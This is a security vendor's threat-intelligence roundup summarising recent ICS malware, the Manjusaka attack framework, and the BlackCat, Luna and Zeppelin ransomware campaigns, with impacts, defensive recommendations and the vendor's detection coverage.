Our research team compiled the latest updates on newly announced CVEs, recent ransomware attacks including BlackCat & Luna, and IoT security news. They also offer analysis of the potential impacts and their expert recommendations:
Sality Malware Infecting ICS Using a Password Recovery Tool
A threat actor is infecting ICS to create a botnet through password “cracking”
software for PLCs and HMIs. In one incident, the tool exploited CVE-2022-2003 in DirectLogic PLCs from Automation Direct to extract the password and dropped Sality, a piece of malware that creates a peer-to-peer botnet.
Affected Vendors: This recovery tool promises to unlock PLCs and HMIs from Automation Direct, Omron, Siemens, Fuji Electric, Mitsubishi, LG, Vigor, Schneider Electric, Allen Bradley, Weintek, ABB, and Panasonic.
Attack Parameters: The exploit used by the tool can be done over serial-only communications, as well as over Ethernet.
Impact: Sality can terminate processes, open connections to remote sites, download additional payloads, or steal data from the host. It can also inject itself into running processes and copy itself onto network shares, external drives, and removable storage devices that could carry it to other systems.
In this case, it appeared to be focused on stealing cryptocurrency.
Recommendations: Automation Direct has released a patch for the exploited vulnerability.
SCADAfence Coverage: The vulnerabilities exploited in this attack are included in the CVE DB.
Manjusaka Post-Exploitation Attack Framework
A new post-exploitation attack framework, Manjusaka, an alternative to Cobalt Strike, was observed in the wild
Attack Parameters: Manjusaka uses implants written in Rust, while its binaries are written in GoLang. Its RAT implants support command execution, file access, network reconnaissance, and more, so hackers can use it for the same operational goals as Cobalt Strike.
The implant can execute arbitrary commands using “cmd.exe”, get file information, get current network connections, collect browser credentials, take screenshots, obtain system information, and activate the file management module.
The infection chain includes a malicious document that executes to fetch a second-stage payload, Cobalt Strike, and load it in memory. Cobalt Strike is later used to download Manjusaka implants.
The C2 communications are executed via HTTP GET requests.
Impact: Right now, it looks like Manjusaka is tentatively deployed for testing, so its development is likely not in its final phases. However, it is already powerful enough for real-world use.
Recommendations: Track HTTP activity for potential attacks using the User Activity Analyzer.
SCADAfence Coverage: The SCADAfence Platform detects the use of Cobalt Strike. The Scadafence platform also detects command execution via HTTP GET requests and via “cmd.exe”.
BlackCat Attack on European Gas Pipeline
The ALPHV ransomware gang, BlackCat, claimed responsibility for a ransomware attack against Creos Luxembourg S.A., a natural gas pipeline and electricity network operator in the central European country.
Attack Parameters: BlackCat has been observed using multiple tools in their attacks, such as Mimikatz to recover stored passwords. The ransomware exploits the ProxyShell and ProxyLogon vulnerabilities to gain remote access and the ability to execute arbitrary code and commands. This is used for spawning a PowerShell process that downloads a Cobalt Strike beacon.
Impact: The customer portals of Encevo and Creos were unavailable, but there was no interruption in the provided services. The group claims to have exfiltrated roughly 150 Gb of information, including contracts, agreements, passports, bills, and emails.
SCADAfence Coverage: The SCADAfence Platform detects the use of Mimikatz and Cobalt Strike, as well as the exploitation of the ProxyShell vulnerability.
A new ransomware, dubbed Luna, can be used to encrypt devices running several operating systems, including Windows, Linux, and ESXi systems.
Attack Parameters: The ransomware is written in Rust, enabling attackers to port it to multiple platforms and enabling it to evade automated static code analysis attempts.
The ransomware appears to be specifically tailored to be used only by Russian-speaking threat actors.
Impact: Luna confirms the latest trend of developing cross-platform ransomware that use languages like Rust and Golang to create malware capable of targeting multiple operating systems with little to no changes.
SCADAfence Coverage: The SCADAfence Platform detects new connections, connections to and from external devices, and connections to and from the Internet.
The SCADAfence Platform detects suspicious behavior based on IP reputation, hash reputation, and domain reputation.
CISA and the FBI released a joint advisory detailing IOCs and TTPs of Zepplin ransomware, a RaaS which encrypts their victim’s files multiple times. The group was also seen using the double-extortion method.
Targets: Zeppelin was observed targeting businesses and critical infrastructure organizations such as defense contractors and technology companies, with a focus on entities from the healthcare and medical industries.
Attack Parameters: The group gains access to victim networks using RDP exploitation, breaching SonicWall firewall vulnerabilities, and phishing campaigns.Zeppelin executed their malware multiple times within a victim's network, resulting in the creation of different IDs or file extensions, resulting in the victim needing several unique decryption keys.
Impact: Zeppelin actors have been known to request ransom payments in Bitcoin, with initial amounts ranging from several thousand dollars to over a million dollars.
SCADAfence Coverage: RDP connections can be tracked using the User Activity Analyzer.
The SCADAfence Platform detects new connections, connections to and from external devices, and connections to and from the Internet. The SCADAfence Platform detects suspicious behavior based on IP reputation, hash reputation, and domain reputation.
Following are additional best practices recommendations to protect against all strains of malware and ransomware:
- Make sure secure offline backups of critical systems are available and up-to-date.
- Apply the latest security patches on the assets in the network.
- Use unique passwords and multi-factor authentication on authentication paths to OT assets.
- Encrypt sensitive data when possible.
- Educate staff about the risks and methods of ransomware attacks and how to avoid infection.
For more information on keeping your ICS/OT systems protected from threats, or to see the SCADAfence platform in action, request a demo now.